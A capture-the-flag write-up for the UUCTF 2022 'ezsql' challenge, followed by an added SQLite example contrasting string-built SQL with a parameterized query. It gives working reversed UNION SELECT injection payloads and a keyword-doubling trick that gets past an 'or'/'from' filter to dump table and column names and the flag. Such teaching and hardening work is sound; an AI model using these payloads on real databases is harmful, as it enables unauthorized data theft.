[UUCTF 2022 Freshman Contest] ezsql

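First, run a routine test with the universal password 1' or 1=1 -- -. The echoed output shows that "or" is filtered and that the input is reversed,
so every payload that follows has to be reversed before it is sent.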

s = "需要逆向的值"  # placeholder: the value to reverse
r = s[::-1]  # a slice with step -1 reverses the string
print(r)

Find the database name:

1') union select 1,database()#

)(esabatad,1 tceles noinu )'1

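Find the table names:

"from" is filtered, and "or" is filtered as well. Because the input is reversed, "from" can be written as "frroom": reversed for sending it reads "moorrf", and removing "or" from that leaves "morf", which is "from" once the input is reversed.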

1') union select 1,table_name frroom information_schema.tables where table_schema='UUCTF' #

'FTCUU'=amehcs_elbat erehw selbat.amehcs_noitamrofni moorrf eman_elbat,1 tceles noinu )'1

Find the column names:

1') union select 1,column_name frroom information_schema.columns where table_name='flag'#

'galf'=eman_elbat erehw snmuloc.amehcs_noitamrofni moorrf eman_nmuloc,1 tceles noinu )'1

Read the column value:

1') union select 1,UUCTF frroom flag#

galf moorrf FTCUU,1 tceles noinu )'1
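
An added example, not part of the original write-up: the filter behaviour inferred above next to a parameterized query, run against an in-memory SQLite database, to show why stripping keywords does not stop the injection while binding the input does. The filter logic, the users table, the flag value and the function names are assumptions constructed for illustration, and MySQL's # comment is replaced by SQLite's --.

```python
import sqlite3

BLOCKLIST = ("from", "or")  # keywords the write-up reports as filtered

def challenge_filter(raw):
    # Assumed server logic: delete each keyword in a single pass, then reverse.
    for word in BLOCKLIST:
        raw = raw.replace(word, "")
    return raw[::-1]

def make_db():
    # Constructed sample data; only the flag table and UUCTF column names come from the page.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (id TEXT, name TEXT);
        INSERT INTO users VALUES ('1', 'alice');
        CREATE TABLE flag (UUCTF TEXT);
        INSERT INTO flag VALUES ('constructed-secret');
    """)
    return db

def lookup_concat(db, raw):
    # Vulnerable: the filtered input is pasted into the SQL text.
    value = challenge_filter(raw)
    sql = "SELECT id, name FROM users WHERE id=('" + value + "')"
    return db.execute(sql).fetchall()

def lookup_bound(db, raw):
    # Hardened: the input is bound as a parameter, so it can only ever be a value.
    sql = "SELECT id, name FROM users WHERE id=(?)"
    return db.execute(sql, (raw,)).fetchall()

# The write-up's last payload, reversed for sending, with '#' swapped for '--'.
SENT = "1') union select 1,UUCTF frroom flag--"[::-1]

if __name__ == "__main__":
    db = make_db()
    print("after filter:", challenge_filter(SENT))  # 'moorrf' has become 'from'
    print("concatenated:", lookup_concat(db, SENT))  # the flag row is returned
    print("parameterized:", lookup_bound(db, SENT))  # no rows: input stayed data
```

With the bound query the keyword filter and the reversal are unnecessary, because the driver never parses the input as SQL.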

posted @ 2023-06-27 13:13  Magic水瓶